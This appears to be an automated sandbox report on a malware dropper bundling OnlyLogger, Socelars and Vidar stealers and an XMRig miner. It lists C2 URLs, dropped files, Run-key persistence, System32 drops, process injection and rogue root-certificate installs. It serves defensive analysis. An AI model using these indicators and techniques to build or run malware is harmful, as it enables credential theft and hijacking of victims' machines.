onlylogger | 20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49

Analysis

max time kernel
120s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
12-06-2022 09:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe
Size

3.6MB
MD5

d1d52827f917a0ac5604e6d32835093c
SHA1

6e615f013f5ccda98199eadfd8cef500e58d1fc0
SHA256

20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49
SHA512

0f3aeb8c1951c2548b16433037e11a22cb3119567a8ad1477a19ab57105e201736fdf749dc13d387e9a874acef313ddcaf5942cbc3a4f81037a0e95db31a82ce

Score

10^/10

onlylogger socelars vidar xmrig 933 discovery loader miner persistence spyware stealer

Malware Config

Extracted

Family

socelars

http://www.chosenncrowned.com/

Extracted

Family

vidar

Version

49.4

Botnet

933

https://mastodon.online/@banda1ker

https://koyu.space/@banda2ker

Attributes

profile_id
933

Signatures

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2376 2624 rundll32.exe
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2376	2624	rundll32.exe

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4132-204-0x0000000000400000-0x0000000000798000-memory.dmp	family_onlylogger
behavioral2/memory/4132-203-0x0000000000870000-0x00000000008B3000-memory.dmp	family_onlylogger

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3528-165-0x0000000000AC0000-0x0000000000B96000-memory.dmp	family_vidar
behavioral2/memory/3528-201-0x0000000000400000-0x00000000007EE000-memory.dmp	family_vidar
behavioral2/memory/3528-227-0x0000000000AC0000-0x0000000000B96000-memory.dmp	family_vidar
behavioral2/memory/3528-230-0x0000000000400000-0x00000000007EE000-memory.dmp	family_vidar

XMRig Miner Payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4272-303-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4272-304-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/4272-306-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4272-309-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4056-313-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4056-310-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4056-308-0x000000014030F3F8-mapping.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 30 IoCs

Processes:

RobCleanerInstll33132.exelijia.exelijia.exeProxyupd.exeFixfile01.exeinst.exesetup.exeaskinstall25.exeMyNotes Installation.exemyfile.exeanytime1.exeanytime2.exeanytime3.exeanytime4.exelogger.exeLzmwAqmV.exeLzmwAqmV.exeMyNotes License Agreement.exeservices64.exeservices64.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exesihost64.exeMyNotes.exeMyNotes.exe

pid	process
1428	RobCleanerInstll33132.exe
3788	lijia.exe
3472	lijia.exe
3112	Proxyupd.exe
3528	Fixfile01.exe
4056	inst.exe
4132	setup.exe
4100	askinstall25.exe
4844	MyNotes Installation.exe
1228	myfile.exe
432	anytime1.exe
3000	anytime2.exe
3712	anytime3.exe
4664	anytime4.exe
3508	logger.exe
4136	LzmwAqmV.exe
1320	LzmwAqmV.exe
4888	MyNotes License Agreement.exe
980	services64.exe
2440	services64.exe
3944	MyNotes.exe
2524	MyNotes.exe
4372	MyNotes.exe
4428	MyNotes.exe
3720	MyNotes.exe
3392	MyNotes.exe
4348	MyNotes.exe
2184	sihost64.exe
3288	MyNotes.exe
176	MyNotes.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

myfile.exeanytime4.exeMyNotes.exeMyNotes.exeMyNotes.exe20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exelijia.exelogger.exeanytime1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	myfile.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	anytime4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	MyNotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	MyNotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	MyNotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	20fee4355bf909eb904b31ce96c328d8965b71daf0b8ef255f6278c8b5ddfe49.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	lijia.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	logger.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	anytime1.exe

Loads dropped DLL 42 IoCs

Processes:

MyNotes Installation.exeMyNotes License Agreement.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exeMyNotes.exe

pid	process
4844	MyNotes Installation.exe
4844	MyNotes Installation.exe
4844	MyNotes Installation.exe
4844	MyNotes Installation.exe
4844	MyNotes Installation.exe
4888	MyNotes License Agreement.exe
4888	MyNotes License Agreement.exe
4888	MyNotes License Agreement.exe
4888	MyNotes License Agreement.exe
3944	MyNotes.exe
4888	MyNotes License Agreement.exe
4888	MyNotes License Agreement.exe
4844	MyNotes Installation.exe
3944	MyNotes.exe
3944	MyNotes.exe
2524	MyNotes.exe
4372	MyNotes.exe
4372	MyNotes.exe
4372	MyNotes.exe
4428	MyNotes.exe
4428	MyNotes.exe
4428	MyNotes.exe
3720	MyNotes.exe
3720	MyNotes.exe
3720	MyNotes.exe
3392	MyNotes.exe
4348	MyNotes.exe
3392	MyNotes.exe
3392	MyNotes.exe
4348	MyNotes.exe
4348	MyNotes.exe
3392	MyNotes.exe
3392	MyNotes.exe
4348	MyNotes.exe
4348	MyNotes.exe
4372	MyNotes.exe
3288	MyNotes.exe
3288	MyNotes.exe
3288	MyNotes.exe
176	MyNotes.exe
176	MyNotes.exe
176	MyNotes.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MyNotes License Agreement.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	MyNotes License Agreement.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyNotes = "C:\\Users\\Admin\\AppData\\Roaming\\MyNotes\\MyNotes.exe --Vk93vNV"	MyNotes License Agreement.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in System32 directory 6 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.execonhost.exe

description	pid	process	target process
PID 3348 set thread context of 4272	3348	conhost.exe	explorer.exe
PID 5088 set thread context of 4056	5088	conhost.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4588	4132	WerFault.exe	setup.exe
4308	1228	WerFault.exe	myfile.exe
2296	3508	WerFault.exe	logger.exe
3792	3000	WerFault.exe	anytime2.exe
3752	4132	WerFault.exe	setup.exe
4124	4132	WerFault.exe	setup.exe
4752	4132	WerFault.exe	setup.exe
4524	4132	WerFault.exe	setup.exe
4288	4132	WerFault.exe	setup.exe
3720	4132	WerFault.exe	setup.exe
5072	4132	WerFault.exe	setup.exe

NSIS installer 8 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\MyNotes Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\MyNotes Installation.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\MyNotes Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\MyNotes Installation.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\SKfJPz8D7ef4g\MyNotes License Agreement.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\SKfJPz8D7ef4g\MyNotes License Agreement.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\SKfJPz8D7ef4g\MyNotes License Agreement.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\SKfJPz8D7ef4g\MyNotes License Agreement.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1800 schtasks.exe
4044 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2080 taskkill.exe

pid	process
1800	schtasks.exe
4044	schtasks.exe

pid	process
2080	taskkill.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

askinstall25.exeMyNotes.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53	askinstall25.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53\Blob = 030000000100000014000000151682f5218c0a511c28f4060a73b9ca78ce9a531400000001000000140000007c4296aede4b483bfa92f89e8ccf6d8ba972379504000000010000001000000029f1c1b26d92e893b6e6852ab708cce10f00000001000000200000005aef843ffcf2ec7055f504a162f229f8391c370ff3a6163d2db3f3d604d622be19000000010000001000000070d4f0bec2078234214bd651643b02405c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da62000000001000000640400003082046030820248a0030201020210079e492886376fd40848c23fc631e463300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f742058323076301006072a8648ce3d020106052b8104002203620004cd9bd59f80830aec094af3164a3e5ccf77acde67050d1d07b6dc16fb5a8b14dbe27160c4ba459511898eea06dff72a161ca4b9c5c532e003e01e8218388bd745d80a6a6ee60077fb02517d22d80a6e9a5b77dff0fa41ec39dc75ca68070c1feaa381e53081e2300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604147c4296aede4b483bfa92f89e8ccf6d8ba9723795301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b050003820201001b7f252b907a0876007718e1c32e8a364c417ebf174be330d75b0c7e9c96986f7bb068c02444cce2f2fcd1eadbd29f01f9174d0c9d55fda5ad6dd22f3f4b72c02eae73c7251657c23e15ade031d10a84846c6278423122461aed7a40bf9716814477ca6c7b5d215c07f2119121bfe12fc2ef6efd0520e4b4f779f32dbb372af0c6b1acac51f51fb35a1e66ce580718387f71a93c83bad7bc829e9a760f9eb029fdcbf38907481bfeab932e14210d5faf8eb754ab5d0ed45b4c71d092ea3da3369b7c1fe03b55b9d85353cc8366bb4adc810600188bf4b3d748b11341b9c4b69ecf2c778e42200b807e9fc5ab48dbbc6f048d6c4629020d708a1df11273b64624429e2a1718e3acc798c272cc6d2d766ddd2c2b2696a5cf21081be5da2fcbef9f7393aef8365f478f9728ceabe29826988bfdee28322229ed4c9509c420fa07e1862c44f68147c0e46232ed1dd83c488896c35e91b6af7b59a4eee3869cc78858ca282a66559b8580b91dd8402bc91c133ca9ebde99c21640f6f5a4ae2a256c52bac7044cb432bbfc385ca00c617b57ec774e50cfaf06a20f378ce10ed2d32f1abd9c713ecce1f8d1a8a3bd04f619c0f986aff50e1aaa956befca47714b631c4d96db55230a9d0f8175a0e640f56446036ecefa6a7d06eca4340674da53d8b9b8c6237da9f82a2da482a62e2d11cae6cd31587985e6721ca79fd34cd066d0a7bb	askinstall25.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	MyNotes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	MyNotes.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	MyNotes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	askinstall25.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da65c00000001000000040000000010000020000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	askinstall25.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	askinstall25.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
